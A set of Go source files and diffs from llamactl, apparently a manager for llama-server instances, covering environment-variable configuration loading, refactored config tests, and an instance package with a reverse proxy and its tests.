if maxInstances := os.Getenv("LLAMACTL_MAX_INSTANCES"); maxInstances != "" {
if m, err := strconv.Atoi(maxInstances); err == nil {
cfg.Instances.MaxInstances = m
}
}
if maxRunning := os.Getenv("LLAMACTL_MAX_RUNNING_INSTANCES"); maxRunning != "" {
if m, err := strconv.Atoi(maxRunning); err == nil {
cfg.Instances.MaxRunningInstances = m
}
}
if enableLRUEviction := os.Getenv("LLAMACTL_ENABLE_LRU_EVICTION"); enableLRUEviction != "" {
if b, err := strconv.ParseBool(enableLRUEviction); err == nil {
cfg.Instances.EnableLRUEviction = b
}
}
if llamaExec := os.Getenv("LLAMACTL_LLAMA_EXECUTABLE"); llamaExec != "" {
cfg.Instances.LlamaExecutable = llamaExec
}
if autoRestart := os.Getenv("LLAMACTL_DEFAULT_AUTO_RESTART"); autoRestart != "" {
if b, err := strconv.ParseBool(autoRestart); err == nil {
cfg.Instances.DefaultAutoRestart = b
}
}
if maxRestarts := os.Getenv("LLAMACTL_DEFAULT_MAX_RESTARTS"); maxRestarts != "" {
if m, err := strconv.Atoi(maxRestarts); err == nil {
cfg.Instances.DefaultMaxRestarts = m
}
}
if restartDelay := os.Getenv("LLAMACTL_DEFAULT_RESTART_DELAY"); restartDelay != "" {
if seconds, err := strconv.Atoi(restartDelay); err == nil {
cfg.Instances.DefaultRestartDelay = seconds
}
}
if onDemandStart := os.Getenv("LLAMACTL_DEFAULT_ON_DEMAND_START"); onDemandStart != "" {
if b, err := strconv.ParseBool(onDemandStart); err == nil {
cfg.Instances.DefaultOnDemandStart = b
}
}
if onDemandTimeout := os.Getenv("LLAMACTL_ON_DEMAND_START_TIMEOUT"); onDemandTimeout != "" {
if seconds, err := strconv.Atoi(onDemandTimeout); err == nil {
cfg.Instances.OnDemandStartTimeout = seconds
}
}
if timeoutCheckInterval := os.Getenv("LLAMACTL_TIMEOUT_CHECK_INTERVAL"); timeoutCheckInterval != "" {
if minutes, err := strconv.Atoi(timeoutCheckInterval); err == nil {
cfg.Instances.TimeoutCheckInterval = minutes
}
}
// Auth config
if requireInferenceAuth := os.Getenv("LLAMACTL_REQUIRE_INFERENCE_AUTH"); requireInferenceAuth != "" {
if b, err := strconv.ParseBool(requireInferenceAuth); err == nil {
cfg.Auth.RequireInferenceAuth = b
}
}
if inferenceKeys := os.Getenv("LLAMACTL_INFERENCE_KEYS"); inferenceKeys != "" {
cfg.Auth.InferenceKeys = strings.Split(inferenceKeys, ",")
}
if requireManagementAuth := os.Getenv("LLAMACTL_REQUIRE_MANAGEMENT_AUTH"); requireManagementAuth != "" {
if b, err := strconv.ParseBool(requireManagementAuth); err == nil {
cfg.Auth.RequireManagementAuth = b
}
}
if managementKeys := os.Getenv("LLAMACTL_MANAGEMENT_KEYS"); managementKeys != "" {
cfg.Auth.ManagementKeys = strings.Split(managementKeys, ",")
}
}
// ParsePortRange parses port range from string formats like "8000-9000" or "8000,9000"
func ParsePortRange(s string) [2]int {
var parts []string
// Try both separators
if strings.Contains(s, "-") {
parts = strings.Split(s, "-")
} else if strings.Contains(s, ",") {
parts = strings.Split(s, ",")
}
// Parse the two parts
if len(parts) == 2 {
start, err1 := strconv.Atoi(strings.TrimSpace(parts[0]))
end, err2 := strconv.Atoi(strings.TrimSpace(parts[1]))
if err1 == nil && err2 == nil {
return [2]int{start, end}
}
}
return [2]int{0, 0} // Invalid format
}
// getDefaultDataDirectory returns platform-specific default data directory
func getDefaultDataDirectory() string {
switch runtime.GOOS {
case "windows":
// Try PROGRAMDATA first (system-wide), fallback to LOCALAPPDATA (user)
if programData := os.Getenv("PROGRAMDATA"); programData != "" {
return filepath.Join(programData, "llamactl")
}
if localAppData := os.Getenv("LOCALAPPDATA"); localAppData != "" {
return filepath.Join(localAppData, "llamactl")
}
return "C:\\ProgramData\\llamactl" // Final fallback
case "darwin":
// For macOS, use user's Application Support directory
if homeDir, _ := os.UserHomeDir(); homeDir != "" {
return filepath.Join(homeDir, "Library", "Application Support", "llamactl")
}
return "/usr/local/var/llamactl" // Fallback
default:
// Linux and other Unix-like systems
if homeDir, _ := os.UserHomeDir(); homeDir != "" {
return filepath.Join(homeDir, ".local", "share", "llamactl")
}
return "/var/lib/llamactl" // Final fallback
}
}
// getDefaultConfigLocations returns platform-specific config file locations
func getDefaultConfigLocations() []string {
var locations []string
homeDir, _ := os.UserHomeDir()
switch runtime.GOOS {
case "windows":
// Windows: Use APPDATA if available, else user home, fallback to ProgramData
if appData := os.Getenv("APPDATA"); appData != "" {
locations = append(locations, filepath.Join(appData, "llamactl", "config.yaml"))
} else if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, "llamactl", "config.yaml"))
}
locations = append(locations, filepath.Join(os.Getenv("PROGRAMDATA"), "llamactl", "config.yaml"))
case "darwin":
// macOS: Use Application Support in user home, fallback to /Library/Application Support
if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"))
}
locations = append(locations, "/Library/Application Support/llamactl/config.yaml")
default:
// Linux/Unix: Use ~/.config/llamactl/config.yaml, fallback to /etc/llamactl/config.yaml
if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, ".config", "llamactl", "config.yaml"))
}
locations = append(locations, "/etc/llamactl/config.yaml")
}
return locations
}
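LoadConfig's precedence (hardcoded defaults, then the config file, then environment variables) can be checked end to end. A small sketch using only identifiers defined above; the temp file path and values are arbitrary:

package main

import (
	"fmt"
	"log"
	"os"
	"path/filepath"

	"llamactl/pkg/config"
)

func main() {
	// The file sets logs_dir and max_instances; the env var should win for logs_dir.
	path := filepath.Join(os.TempDir(), "llamactl-example.yaml")
	yamlBody := "instances:\n  logs_dir: /from/file\n  max_instances: 5\n"
	if err := os.WriteFile(path, []byte(yamlBody), 0o644); err != nil {
		log.Fatal(err)
	}
	os.Setenv("LLAMACTL_LOGS_DIR", "/from/env")
	defer os.Unsetenv("LLAMACTL_LOGS_DIR")

	cfg, err := config.LoadConfig(path)
	if err != nil {
		log.Fatal(err)
	}
	fmt.Println(cfg.Instances.LogsDir)      // /from/env: env overrides file
	fmt.Println(cfg.Instances.MaxInstances) // 5: file overrides the -1 default
}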

View File

@@ -1,16 +1,15 @@
-package llamactl_test
+package config_test

 import (
+	"llamactl/pkg/config"
 	"os"
 	"path/filepath"
 	"testing"
-
-	llamactl "llamactl/pkg"
 )

 func TestLoadConfig_Defaults(t *testing.T) {
 	// Test loading config when no file exists and no env vars set
-	cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
+	cfg, err := config.LoadConfig("nonexistent-file.yaml")
 	if err != nil {
 		t.Fatalf("LoadConfig should not error with defaults: %v", err)
 	}
@@ -22,12 +21,24 @@ func TestLoadConfig_Defaults(t *testing.T) {
 	if cfg.Server.Port != 8080 {
 		t.Errorf("Expected default port to be 8080, got %d", cfg.Server.Port)
 	}
+	homedir, err := os.UserHomeDir()
+	if err != nil {
+		t.Fatalf("Failed to get user home directory: %v", err)
+	}
+	if cfg.Instances.InstancesDir != filepath.Join(homedir, ".local", "share", "llamactl", "instances") {
+		t.Errorf("Expected default instances directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "instances"), cfg.Instances.InstancesDir)
+	}
+	if cfg.Instances.LogsDir != filepath.Join(homedir, ".local", "share", "llamactl", "logs") {
+		t.Errorf("Expected default logs directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "logs"), cfg.Instances.LogsDir)
+	}
+	if !cfg.Instances.AutoCreateDirs {
+		t.Error("Expected default instances auto-create to be true")
+	}
 	if cfg.Instances.PortRange != [2]int{8000, 9000} {
 		t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange)
 	}
-	if cfg.Instances.LogDirectory != "/tmp/llamactl" {
-		t.Errorf("Expected default log directory '/tmp/llamactl', got %q", cfg.Instances.LogDirectory)
-	}
 	if cfg.Instances.MaxInstances != -1 {
 		t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
 	}
@@ -56,7 +67,7 @@ server:
   port: 9090
 instances:
   port_range: [7000, 8000]
-  log_directory: "/custom/logs"
+  logs_dir: "/custom/logs"
   max_instances: 5
   llama_executable: "/usr/bin/llama-server"
   default_auto_restart: false
@@ -69,7 +80,7 @@ instances:
 		t.Fatalf("Failed to write test config file: %v", err)
 	}

-	cfg, err := llamactl.LoadConfig(configFile)
+	cfg, err := config.LoadConfig(configFile)
 	if err != nil {
 		t.Fatalf("LoadConfig failed: %v", err)
 	}
@@ -84,8 +95,8 @@ instances:
 	if cfg.Instances.PortRange != [2]int{7000, 8000} {
 		t.Errorf("Expected port range [7000, 8000], got %v", cfg.Instances.PortRange)
 	}
-	if cfg.Instances.LogDirectory != "/custom/logs" {
-		t.Errorf("Expected log directory '/custom/logs', got %q", cfg.Instances.LogDirectory)
+	if cfg.Instances.LogsDir != "/custom/logs" {
+		t.Errorf("Expected logs directory '/custom/logs', got %q", cfg.Instances.LogsDir)
 	}
 	if cfg.Instances.MaxInstances != 5 {
 		t.Errorf("Expected max instances 5, got %d", cfg.Instances.MaxInstances)
@@ -110,7 +121,7 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
 		"LLAMACTL_HOST":                 "0.0.0.0",
 		"LLAMACTL_PORT":                 "3000",
 		"LLAMACTL_INSTANCE_PORT_RANGE":  "5000-6000",
-		"LLAMACTL_LOG_DIR":              "/env/logs",
+		"LLAMACTL_LOGS_DIR":             "/env/logs",
 		"LLAMACTL_MAX_INSTANCES":        "20",
 		"LLAMACTL_LLAMA_EXECUTABLE":     "/env/llama-server",
 		"LLAMACTL_DEFAULT_AUTO_RESTART": "false",
@@ -124,7 +135,7 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
 		defer os.Unsetenv(key)
 	}

-	cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
+	cfg, err := config.LoadConfig("nonexistent-file.yaml")
 	if err != nil {
 		t.Fatalf("LoadConfig failed: %v", err)
 	}
@@ -139,8 +150,8 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
 	if cfg.Instances.PortRange != [2]int{5000, 6000} {
 		t.Errorf("Expected port range [5000, 6000], got %v", cfg.Instances.PortRange)
 	}
-	if cfg.Instances.LogDirectory != "/env/logs" {
-		t.Errorf("Expected log directory '/env/logs', got %q", cfg.Instances.LogDirectory)
+	if cfg.Instances.LogsDir != "/env/logs" {
+		t.Errorf("Expected logs directory '/env/logs', got %q", cfg.Instances.LogsDir)
 	}
 	if cfg.Instances.MaxInstances != 20 {
 		t.Errorf("Expected max instances 20, got %d", cfg.Instances.MaxInstances)
@@ -183,7 +194,7 @@ instances:
 	defer os.Unsetenv("LLAMACTL_HOST")
 	defer os.Unsetenv("LLAMACTL_MAX_INSTANCES")

-	cfg, err := llamactl.LoadConfig(configFile)
+	cfg, err := config.LoadConfig(configFile)
 	if err != nil {
 		t.Fatalf("LoadConfig failed: %v", err)
 	}
@@ -219,7 +230,7 @@ instances:
 		t.Fatalf("Failed to write test config file: %v", err)
 	}

-	_, err = llamactl.LoadConfig(configFile)
+	_, err = config.LoadConfig(configFile)
 	if err == nil {
 		t.Error("Expected LoadConfig to return error for invalid YAML")
 	}
@@ -245,7 +256,7 @@ func TestParsePortRange(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			result := llamactl.ParsePortRange(tt.input)
+			result := config.ParsePortRange(tt.input)
 			if result != tt.expected {
 				t.Errorf("ParsePortRange(%q) = %v, expected %v", tt.input, result, tt.expected)
 			}
@@ -260,31 +271,31 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
 	testCases := []struct {
 		envVar   string
 		envValue string
-		checkFn  func(*llamactl.Config) bool
+		checkFn  func(*config.AppConfig) bool
 		desc     string
 	}{
 		{
 			envVar:   "LLAMACTL_PORT",
 			envValue: "invalid-port",
-			checkFn:  func(c *llamactl.Config) bool { return c.Server.Port == 8080 }, // Should keep default
+			checkFn:  func(c *config.AppConfig) bool { return c.Server.Port == 8080 }, // Should keep default
 			desc:     "invalid port number should keep default",
 		},
 		{
 			envVar:   "LLAMACTL_MAX_INSTANCES",
 			envValue: "not-a-number",
-			checkFn:  func(c *llamactl.Config) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
+			checkFn:  func(c *config.AppConfig) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
 			desc:     "invalid max instances should keep default",
 		},
 		{
 			envVar:   "LLAMACTL_DEFAULT_AUTO_RESTART",
 			envValue: "invalid-bool",
-			checkFn:  func(c *llamactl.Config) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
+			checkFn:  func(c *config.AppConfig) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
 			desc:     "invalid boolean should keep default",
 		},
 		{
 			envVar:   "LLAMACTL_INSTANCE_PORT_RANGE",
 			envValue: "invalid-range",
-			checkFn:  func(c *llamactl.Config) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
+			checkFn:  func(c *config.AppConfig) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
 			desc:     "invalid port range should keep default",
 		},
 	}
@@ -294,7 +305,7 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
 			os.Setenv(tc.envVar, tc.envValue)
 			defer os.Unsetenv(tc.envVar)

-			cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
+			cfg, err := config.LoadConfig("nonexistent-file.yaml")
 			if err != nil {
 				t.Fatalf("LoadConfig failed: %v", err)
 			}
@@ -323,7 +334,7 @@ server:
 		t.Fatalf("Failed to write test config file: %v", err)
 	}

-	cfg, err := llamactl.LoadConfig(configFile)
+	cfg, err := config.LoadConfig(configFile)
 	if err != nil {
 		t.Fatalf("LoadConfig failed: %v", err)
 	}

View File

@@ -1,253 +0,0 @@
package llamactl
import (
"context"
"encoding/json"
"fmt"
"io"
"log"
"net/http/httputil"
"net/url"
"os/exec"
"sync"
"time"
)
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
// RestartDelay duration in seconds
RestartDelay *int `json:"restart_delay_seconds,omitempty"`
LlamaServerOptions `json:",inline"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
// This is needed because the embedded LlamaServerOptions has its own UnmarshalJSON
// which can interfere with proper unmarshaling of the pointer fields
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// First, unmarshal into a temporary struct without the embedded type
type tempCreateOptions struct {
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay_seconds,omitempty"`
}
var temp tempCreateOptions
if err := json.Unmarshal(data, &temp); err != nil {
return err
}
// Copy the pointer fields
c.AutoRestart = temp.AutoRestart
c.MaxRestarts = temp.MaxRestarts
c.RestartDelay = temp.RestartDelay
// Now unmarshal the embedded LlamaServerOptions
if err := json.Unmarshal(data, &c.LlamaServerOptions); err != nil {
return err
}
return nil
}
// Instance represents a running instance of the llama server
type Instance struct {
Name string `json:"name"`
options *CreateInstanceOptions `json:"-"`
globalSettings *InstancesConfig
// Status
Running bool `json:"running"`
// Creation time
Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
// Logging file
logger *InstanceLogger `json:"-"`
// internal
cmd *exec.Cmd `json:"-"` // Command to run the instance
ctx context.Context `json:"-"` // Context for managing the instance lifecycle
cancel context.CancelFunc `json:"-"` // Function to cancel the context
stdout io.ReadCloser `json:"-"` // Standard output stream
stderr io.ReadCloser `json:"-"` // Standard error stream
mu sync.RWMutex `json:"-"` // RWMutex for better read/write separation
restarts int `json:"-"` // Number of restarts
proxy *httputil.ReverseProxy `json:"-"` // Reverse proxy for this instance
// Restart control
restartCancel context.CancelFunc `json:"-"` // Cancel function for pending restarts
monitorDone chan struct{} `json:"-"` // Channel to signal monitor goroutine completion
}
// validateAndCopyOptions validates and creates a deep copy of the provided options
// It applies validation rules and returns a safe copy
func validateAndCopyOptions(name string, options *CreateInstanceOptions) *CreateInstanceOptions {
optionsCopy := &CreateInstanceOptions{}
if options != nil {
// Copy the embedded LlamaServerOptions
optionsCopy.LlamaServerOptions = options.LlamaServerOptions
// Copy and validate pointer fields
if options.AutoRestart != nil {
autoRestart := *options.AutoRestart
optionsCopy.AutoRestart = &autoRestart
}
if options.MaxRestarts != nil {
maxRestarts := *options.MaxRestarts
if maxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, maxRestarts)
maxRestarts = 0
}
optionsCopy.MaxRestarts = &maxRestarts
}
if options.RestartDelay != nil {
restartDelay := *options.RestartDelay
if restartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, restartDelay)
restartDelay = 0
}
optionsCopy.RestartDelay = &restartDelay
}
}
return optionsCopy
}
// applyDefaultOptions applies default values from global settings to any nil options
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *InstancesConfig) {
if globalSettings == nil {
return
}
if options.AutoRestart == nil {
defaultAutoRestart := globalSettings.DefaultAutoRestart
options.AutoRestart = &defaultAutoRestart
}
if options.MaxRestarts == nil {
defaultMaxRestarts := globalSettings.DefaultMaxRestarts
options.MaxRestarts = &defaultMaxRestarts
}
if options.RestartDelay == nil {
defaultRestartDelay := globalSettings.DefaultRestartDelay
options.RestartDelay = &defaultRestartDelay
}
}
// NewInstance creates a new instance with the given name, log path, and options
func NewInstance(name string, globalSettings *InstancesConfig, options *CreateInstanceOptions) *Instance {
// Validate and copy options
optionsCopy := validateAndCopyOptions(name, options)
// Apply defaults
applyDefaultOptions(optionsCopy, globalSettings)
// Create the instance logger
logger := NewInstanceLogger(name, globalSettings.LogDirectory)
return &Instance{
Name: name,
options: optionsCopy,
globalSettings: globalSettings,
logger: logger,
Running: false,
Created: time.Now().Unix(),
}
}
func (i *Instance) GetOptions() *CreateInstanceOptions {
i.mu.RLock()
defer i.mu.RUnlock()
return i.options
}
func (i *Instance) SetOptions(options *CreateInstanceOptions) {
i.mu.Lock()
defer i.mu.Unlock()
if options == nil {
log.Println("Warning: Attempted to set nil options on instance", i.Name)
return
}
// Validate and copy options and apply defaults
optionsCopy := validateAndCopyOptions(i.Name, options)
applyDefaultOptions(optionsCopy, i.globalSettings)
i.options = optionsCopy
// Clear the proxy so it gets recreated with new options
i.proxy = nil
}
// GetProxy returns the reverse proxy for this instance, creating it if needed
func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
i.mu.Lock()
defer i.mu.Unlock()
if i.proxy == nil {
if i.options == nil {
return nil, fmt.Errorf("instance %s has no options set", i.Name)
}
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", i.options.Host, i.options.Port))
if err != nil {
return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err)
}
i.proxy = httputil.NewSingleHostReverseProxy(targetURL)
}
return i.proxy, nil
}
// MarshalJSON implements json.Marshaler for Instance
func (i *Instance) MarshalJSON() ([]byte, error) {
// Use read lock since we're only reading data
i.mu.RLock()
defer i.mu.RUnlock()
// Create a temporary struct with exported fields for JSON marshalling
temp := struct {
Name string `json:"name"`
Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
}{
Name: i.Name,
Options: i.options,
Running: i.Running,
}
return json.Marshal(temp)
}
// UnmarshalJSON implements json.Unmarshaler for Instance
func (i *Instance) UnmarshalJSON(data []byte) error {
// Create a temporary struct for unmarshalling
temp := struct {
Name string `json:"name"`
Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
}{}
if err := json.Unmarshal(data, &temp); err != nil {
return err
}
// Set the fields
i.Name = temp.Name
i.Running = temp.Running
// Handle options with validation but no defaults
if temp.Options != nil {
i.options = validateAndCopyOptions(i.Name, temp.Options)
}
return nil
}

pkg/instance/instance.go Normal file
View File

@@ -0,0 +1,223 @@
package instance
import (
"context"
"encoding/json"
"fmt"
"io"
"llamactl/pkg/backends"
"llamactl/pkg/config"
"log"
"net/http"
"net/http/httputil"
"net/url"
"os/exec"
"sync"
"sync/atomic"
"time"
)
// TimeProvider interface allows for testing with mock time
type TimeProvider interface {
Now() time.Time
}
// realTimeProvider implements TimeProvider using the actual time
type realTimeProvider struct{}
func (realTimeProvider) Now() time.Time {
return time.Now()
}
// Process represents a running instance of the llama server
type Process struct {
Name string `json:"name"`
options *CreateInstanceOptions `json:"-"`
globalSettings *config.InstancesConfig
// Status
Status InstanceStatus `json:"status"`
onStatusChange func(oldStatus, newStatus InstanceStatus)
// Creation time
Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
// Logging file
logger *InstanceLogger `json:"-"`
// internal
cmd *exec.Cmd `json:"-"` // Command to run the instance
ctx context.Context `json:"-"` // Context for managing the instance lifecycle
cancel context.CancelFunc `json:"-"` // Function to cancel the context
stdout io.ReadCloser `json:"-"` // Standard output stream
stderr io.ReadCloser `json:"-"` // Standard error stream
mu sync.RWMutex `json:"-"` // RWMutex for better read/write separation
restarts int `json:"-"` // Number of restarts
proxy *httputil.ReverseProxy `json:"-"` // Reverse proxy for this instance
// Restart control
restartCancel context.CancelFunc `json:"-"` // Cancel function for pending restarts
monitorDone chan struct{} `json:"-"` // Channel to signal monitor goroutine completion
// Timeout management
lastRequestTime atomic.Int64 // Unix timestamp of last request
timeProvider TimeProvider `json:"-"` // Time provider for testing
}
// NewInstance creates a new instance with the given name, log path, and options
func NewInstance(name string, globalSettings *config.InstancesConfig, options *CreateInstanceOptions, onStatusChange func(oldStatus, newStatus InstanceStatus)) *Process {
// Validate and copy options
options.ValidateAndApplyDefaults(name, globalSettings)
// Create the instance logger
logger := NewInstanceLogger(name, globalSettings.LogsDir)
return &Process{
Name: name,
options: options,
globalSettings: globalSettings,
logger: logger,
timeProvider: realTimeProvider{},
Created: time.Now().Unix(),
Status: Stopped,
onStatusChange: onStatusChange,
}
}
func (i *Process) GetOptions() *CreateInstanceOptions {
i.mu.RLock()
defer i.mu.RUnlock()
return i.options
}
func (i *Process) GetPort() int {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
return i.options.LlamaServerOptions.Port
}
}
return 0
}
func (i *Process) GetHost() string {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
return i.options.LlamaServerOptions.Host
}
}
return ""
}
func (i *Process) SetOptions(options *CreateInstanceOptions) {
i.mu.Lock()
defer i.mu.Unlock()
if options == nil {
log.Println("Warning: Attempted to set nil options on instance", i.Name)
return
}
// Validate and copy options
options.ValidateAndApplyDefaults(i.Name, i.globalSettings)
i.options = options
// Clear the proxy so it gets recreated with new options
i.proxy = nil
}
// SetTimeProvider sets a custom time provider for testing
func (i *Process) SetTimeProvider(tp TimeProvider) {
i.timeProvider = tp
}
// GetProxy returns the reverse proxy for this instance, creating it if needed
func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
i.mu.Lock()
defer i.mu.Unlock()
if i.proxy != nil {
return i.proxy, nil
}
if i.options == nil {
return nil, fmt.Errorf("instance %s has no options set", i.Name)
}
var host string
var port int
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
host = i.options.LlamaServerOptions.Host
port = i.options.LlamaServerOptions.Port
}
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", host, port))
if err != nil {
return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err)
}
proxy := httputil.NewSingleHostReverseProxy(targetURL)
proxy.ModifyResponse = func(resp *http.Response) error {
// Remove CORS headers from llama-server response to avoid conflicts
// llamactl will add its own CORS headers
resp.Header.Del("Access-Control-Allow-Origin")
resp.Header.Del("Access-Control-Allow-Methods")
resp.Header.Del("Access-Control-Allow-Headers")
resp.Header.Del("Access-Control-Allow-Credentials")
resp.Header.Del("Access-Control-Max-Age")
resp.Header.Del("Access-Control-Expose-Headers")
return nil
}
i.proxy = proxy
return i.proxy, nil
}
// MarshalJSON implements json.Marshaler for Instance
func (i *Process) MarshalJSON() ([]byte, error) {
// Use read lock since we're only reading data
i.mu.RLock()
defer i.mu.RUnlock()
// Use anonymous struct to avoid recursion
type Alias Process
return json.Marshal(&struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"`
}{
Alias: (*Alias)(i),
Options: i.options,
})
}
// UnmarshalJSON implements json.Unmarshaler for Instance
func (i *Process) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias Process
aux := &struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"`
}{
Alias: (*Alias)(i),
}
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Handle options with validation and defaults
if aux.Options != nil {
aux.Options.ValidateAndApplyDefaults(i.Name, i.globalSettings)
i.options = aux.Options
}
return nil
}
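Process reads the clock only through the TimeProvider seam above, so tests can swap in a controlled clock and make lastRequestTime-based behavior deterministic. A sketch of such a fake (fakeTime is illustrative, not a type from the repo); it would be wired in with inst.SetTimeProvider(&fakeTime{now: time.Now()}):

package instance_test

import "time"

// fakeTime implements the TimeProvider interface with a clock that only
// moves when the test advances it explicitly.
type fakeTime struct {
	now time.Time
}

func (f *fakeTime) Now() time.Time { return f.now }

// Advance moves the fake clock forward by d.
func (f *fakeTime) Advance(d time.Duration) { f.now = f.now.Add(d) }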

View File

@@ -0,0 +1,375 @@
package instance_test
import (
"encoding/json"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"testing"
)
func TestNewInstance(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
}
if inst.IsRunning() {
t.Error("New instance should not be running")
}
// Check that options were properly set with defaults applied
opts := inst.GetOptions()
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
// Check that defaults were applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 3 {
t.Errorf("Expected MaxRestarts to be 3 (default), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
}
}
func TestNewInstance_WithRestartOptions(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Override some defaults
autoRestart := false
maxRestarts := 10
restartDelay := 15
options := &instance.CreateInstanceOptions{
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions()
// Check that explicit values override defaults
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false (overridden)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 {
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 15 {
t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay)
}
}
func TestSetOptions(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
initialOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, initialOptions, mockOnStatusChange)
// Update options
newOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
inst.SetOptions(newOptions)
opts := inst.GetOptions()
if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if inst.GetPort() != 8081 {
t.Errorf("Expected updated port 8081, got %d", inst.GetPort())
}
// Check that defaults are still applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
}
func TestGetProxy(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
